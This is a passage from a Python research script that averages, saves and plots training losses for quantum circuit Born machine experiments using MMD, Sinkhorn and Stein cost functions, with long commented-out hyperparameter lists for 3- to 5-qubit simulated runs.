# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.1)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.08)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('3q-qvm')
# score.append('Exact')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(40)
# N_data_samples.append(40)
# N_kernel_samples.append(2000)
# batch_size.append(20)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('3q-qvm')
# score.append('Spectral')
# stein_eigvecs.append(4)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
'''################################'''
'''FOUR QUBITS'''
'''################################'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.1)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('4q-qvm')
# score.append('Exact')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(50)
# N_data_samples.append(50)
# N_kernel_samples.append(2000)
# batch_size.append(25)
# kernel_type.append('Gaussian')
# cost_func.append('Stein')
# qc.append('4q-qvm')
# score.append('Spectral')
# stein_eigvecs.append(6)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareCostFunctions(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'probs', legend =True)
###################################################################################################################
# #Compute MMD Averages and error bars over certain number of runs
###################################################################################################################
def AverageCost(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs):
'''
This function reads in a number of runs, each run has the same parameters: computes average losses, and error and prints to a new file
'''
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
N_runs = len(runs)
TV_loss_total = np.zeros_like(loss[0]['TV'])
CostTrain_loss_total = np.zeros_like(loss[0][('%s' %cost_func[0], 'Train')])
CostTest_loss_total = np.zeros_like(loss[0][('%s' %cost_func[0], 'Test')])
[average_loss, error_upper, error_lower] = [{} for _ in range(3)]
for run in range(N_runs):
TV_loss_total += loss[run]['TV']
CostTrain_loss_total += loss[run][('%s' %cost_func[run], 'Train')]
CostTest_loss_total += loss[run][('%s' %cost_func[run], 'Test')]
N_epochs = N_epochs[0]
average_loss['TV'] = TV_loss_total/N_runs
average_loss[('%s' %cost_func[run], 'Train')] = CostTrain_loss_total/N_runs
average_loss[('%s' %cost_func[run], 'Test')] = CostTest_loss_total/N_runs
[TV_max, TV_min, cost_train_max, cost_train_min, cost_test_max, cost_test_min] = [np.zeros(N_epochs-1) for _ in range(6)]
for epoch in range(N_epochs-1):
temp_tv = []
temp_cost_test = []
temp_cost_train = []
for run in range(N_runs):
temp_tv.append(loss[run]['TV'][epoch])
temp_cost_test.append(loss[run][('%s' %cost_func[run], 'Test')][epoch])
temp_cost_train.append(loss[run][('%s' %cost_func[run], 'Train')][epoch])
TV_max[epoch] = max(temp_tv)
cost_train_max[epoch] = max(temp_cost_train)
cost_test_max[epoch] = max(temp_cost_test)
TV_min[epoch] = min(temp_tv)
cost_train_min[epoch] = min(temp_cost_train)
cost_test_min[epoch] = min(temp_cost_test)
error_upper['TV'] = np.absolute(average_loss['TV'] - TV_max)
error_upper[('%s' %cost_func[0], 'Train')] = np.absolute(average_loss[('%s' %cost_func[0], 'Train')] - cost_train_max)
error_upper[('%s' %cost_func[0], 'Test')] = np.absolute(average_loss[('%s' %cost_func[0], 'Test')] - cost_test_max)
error_lower['TV'] = np.absolute(average_loss['TV'] - TV_min)
error_lower[('%s' %cost_func[0], 'Train')] = np.absolute(average_loss[('%s' %cost_func[0], 'Train')] - cost_train_min)
error_lower[('%s' %cost_func[0], 'Test')] = np.absolute(average_loss[('%s' %cost_func[0], 'Test')] - cost_test_min)
return average_loss, error_upper, error_lower
def PrintAveragesToFiles(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs):
if all(x == learning_rate[0] for x in learning_rate) is False:
raise ValueError('All Learning Rates must be the same in all inputs.')
elif all(x == sinkhorn_eps[0] for x in sinkhorn_eps) is False:
raise ValueError('All Sinkhorn regularisers must be the same in all inputs.')
average_loss, error_upper, error_lower = AverageCost(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
stein_params = [score[0], stein_eigvecs[0], stein_eta[0], kernel_type[0]]
N_samples = [N_data_samples[0], N_born_samples[0], batch_size[0], N_kernel_samples[0]]
trial_name = MakeTrialNameFile(cost_func[0], data_type[0], data_circuit[0], N_epochs[0],learning_rate[0], qc[0], kernel_type[0], N_samples, stein_params, sinkhorn_eps[0], 'Average')
loss_path = '%s/loss/%s/' %(trial_name, cost_func[0])
TV_path = '%s/loss/TV/' %trial_name
loss_path_upper_error = '%s/loss/%s/upper_error/' %(trial_name, cost_func[0])
loss_path_lower_error = '%s/loss/%s/lower_error/' %(trial_name, cost_func[0])
#create directories to store output training information
MakeDirectory(loss_path)
MakeDirectory(TV_path)
MakeDirectory(loss_path_upper_error)
MakeDirectory(loss_path_lower_error)
#Print Upper Bounds on loss errors
np.savetxt('%s/loss/%s/upper_error/train' %(trial_name,cost_func[0]), error_upper[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/upper_error/test' %(trial_name,cost_func[0]), error_upper[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/upper_error' %(trial_name), error_upper[('TV')])
#Print Lower Bounds on loss errors
np.savetxt('%s/loss/%s/lower_error/train' %(trial_name,cost_func[0]), error_lower[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/lower_error/test' %(trial_name,cost_func[0]), error_lower[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/lower_error' %(trial_name), error_lower[('TV')])
np.savetxt('%s/loss/%s/train_avg' %(trial_name,cost_func[0]), average_loss[('%s' %cost_func[0], 'Train')])
np.savetxt('%s/loss/%s/test_avg' %(trial_name,cost_func[0]), average_loss[('%s' %cost_func[0], 'Test')] )
np.savetxt('%s/loss/TV/average' %(trial_name), average_loss[('TV')]) #Print Total Variation of Distributions during training
return
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(1)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(2)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(3)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('5q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(1)
# runs.append(4)
# PrintAveragesToFiles(N_epochs, learning_rate, data_type, data_circuit,N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs)
####################################################################################################################
# #Plot Single Cost
###################################################################################################################
def PlotSingleCostFunction(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps,0)
x = np.arange(0, N_epochs-1, 1)
if comparison.lower() == 'cost':
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps)
if cost_func.lower() == 'mmd':
try:
train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
plot_colour = 'r'
plt.plot(x, average_loss['MMD', 'Train'],'%so-' % plot_colour,\
label =r'MMD on training set for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
plt.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='%s'%plot_colour)
plt.plot(x, average_loss['MMD', 'Test'],'%s-' % plot_colour,\
label =r'MMD on test set for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
plt.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3)
elif cost_func.lower() == 'sinkhorn':
try:
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
plot_colour = 'b'
x = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.5, facecolor=plot_colour)
plt.plot(x, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor=plot_colour)
elif cost_func.lower() == 'stein':
if score.lower() == 'exact':
plot_colour = 'c'
plt.plot(loss[('Stein', 'Train')], '%so-' %(plot_colour), label =r'Stein, on training set using Exact score' )
plt.plot(loss[('Stein', 'Test')], '%sx--' %(plot_colour), label =r'Stein, on test set using Exact score ' )
elif score.lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss[('Stein', 'Train')], '%sx-' %(plot_colour), label =r'Stein, on training set using Spectral score' )
plt.plot(loss[('Stein', 'Test')], '%s-' %(plot_colour), label =r'Stein, on test set using Spectral score.' )
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'tv':
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps)
except:
pass
x = np.arange(0, N_epochs-1, 1)
if cost_func.lower() == 'mmd':
#Compute Average losses and errors, over a certain number of runs
plot_colour = 'r'
plt.plot(x, loss['TV'], label =r'MMD on test set for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' % (kernel_type[0], learning_rate) )
# plt.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2)
elif cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
plt.plot(x, average_loss['TV'],label =r'Sinkhorn using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2)
elif cost_func.lower() == 'stein':
if score.lower() == 'exact':
plot_colour = 'c'
plt.plot(loss['TV'], '%so-' %(plot_colour), label =r'Stein using Exact score.')
elif score.lower() == 'spectral':
plot_colour = 'm'
plt.plot(loss['TV'], '%so-' %(plot_colour), label =r'Stein using Spectral score.')
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
'''3 QUBIT SINKHORN'''
# N_epochs = 200
# learning_rate = 0.01
# data_type = 'Bernoulli_Data'
# data_circuit ='IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type = 'Gaussian'
# cost_func = 'Sinkhorn'
# qc = '3q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
''''4 QUBIT SINKHORN'''
# N_epochs = 200
# learning_rate = 0.05
# data_type = 'Bernoulli_Data'
# data_circuit ='IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type = 'Gaussian'
# cost_func = 'Sinkhorn'
# qc = '4q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 1
# runs = 0
# PlotSingleCostFunction(N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, 'cost', legend = True)
# ###################################################################################################################
# #Compare Kernels
###################################################################################################################
def CompareKernelsPlot(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, comparison, runs, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
# print(len(N_epochs), loss)
if all(x.lower() == 'mmd' for x in cost_func) is False:
#If all cost functions to be compared are the mmd
raise ValueError('All cost functions must be MMD')
else:
if comparison.lower() == 'tv':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'r+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '4':
plot_colour = ['rx-', 'bx-', 'c+-', 'mo-']
elif qc[0][0].lower() == '5':
plot_colour = ['rx-', 'bx-']
elif comparison.lower() == 'mmd':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '4':
plot_colour = ['rx-', 'bx-']
N_trials = len(N_epochs)
x = np.arange(0, N_epochs[0]-1, 1)
if comparison.lower() == 'probs':
fig, axs = plt.subplots()
axs.clear()
x = np.arange(len(data_probs_final[0]))
axs.bar(x, data_probs_final[0].values(), width=0.2, color= 'k' , align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs[2].values(), width=0.2, color='b', align='center')
axs.bar(x-(0.2*(0+2)), born_final_probs[-1].values(), width=0.2, color='r', align='center')
axs.legend(('Data',r'$\mathsf{MMD}$ with $\kappa_G$',r'$\mathsf{MMD}$ with $\kappa_Q$'), fontsize=20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
plt.show()
else:
fig, ax = plt.subplots()
if comparison.lower() == 'tv':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
x1, x2, y1, y2 = 190, 200, 0.01, 0.03 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 2.5, loc='upper center')
x1, x2, y1, y2 = 180, 200, 0.04, 0.09 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='upper center')
x1, x2, y1, y2 = 180, 200, 0.03, 0.09 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
if comparison.lower() == 'mmd':
if qc[0][0].lower() == '2':
plot_colour = ['rs-', 'b+-', 'ro-', 'bs-', 'b+-', 'bo-']
elif qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
x1, x2, y1, y2 = 180, 200, 0.00, 0.04 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 1.5, loc='center')
x1, x2, y1, y2 = 180, 200, 0.00, 0.04 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='center')
x1, x2, y1, y2 = 180, 200, 0.03, 0.09 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
for trial in range(N_trials):
#Compute Average losses and errors, over a certain number of runs
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
tv_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
mmd_train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
mmd_test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
if qc[trial].lower()[0] == '2':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '3':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '4':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
elif qc[trial].lower()[0] == '5':
plot_markers = ['s', '+', 'o', 's', '+', 'o']
if comparison.lower() == 'tv':
if kernel_type[trial][0].lower() == 'q':
# ax.plot(overview_data_x, overview_data_y)
ax.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='r')
axins.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='r')
elif kernel_type[trial][0].lower() == 'g':
ax.plot(x, average_loss['TV'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='c')
axins.plot(x, average_loss['TV'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
axins.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='c')
ax.legend(loc='best', prop={'size': 20})
elif comparison.lower() == 'mmd':
if kernel_type[trial][0].lower() == 'q':
ax.plot(x, average_loss['MMD', 'Train'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='r')
# plt.plot(x, average_loss['MMD', 'Test'], 'r-', label =r'MMD for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.plot(x, average_loss['MMD', 'Test'], 'r-')
ax.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='r')
axins.plot(x, average_loss['MMD', 'Train'], 'r%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='r')
# plt.plot(x, average_loss['MMD', 'Test'], 'r-', label =r'MMD for $\kappa_Q$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.plot(x, average_loss['MMD', 'Test'], 'r-')
axins.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='r')
elif kernel_type[trial][0].lower() == 'g':
ax.plot(x, average_loss['MMD', 'Train'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='b')
# plt.plot(x, average_loss['MMD', 'Test'], 'b-', label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
ax.plot(x, average_loss['MMD', 'Test'], 'b-')
ax.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='b')
axins.plot(x, average_loss['MMD', 'Train'], 'b%s-' %plot_markers[trial], \
label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.fill_between(x, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.3, facecolor='b')
# plt.plot(x, average_loss['MMD', 'Test'], 'b-', label =r'$\mathsf{MMD}$ for $\kappa_G$, $\eta_{init}$ = %.3f.'%learning_rate[trial])
axins.plot(x, average_loss['MMD', 'Test'], 'b-')
axins.fill_between(x, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.1, facecolor='b')
ax.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''
Three QUBITS
'''
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.075)
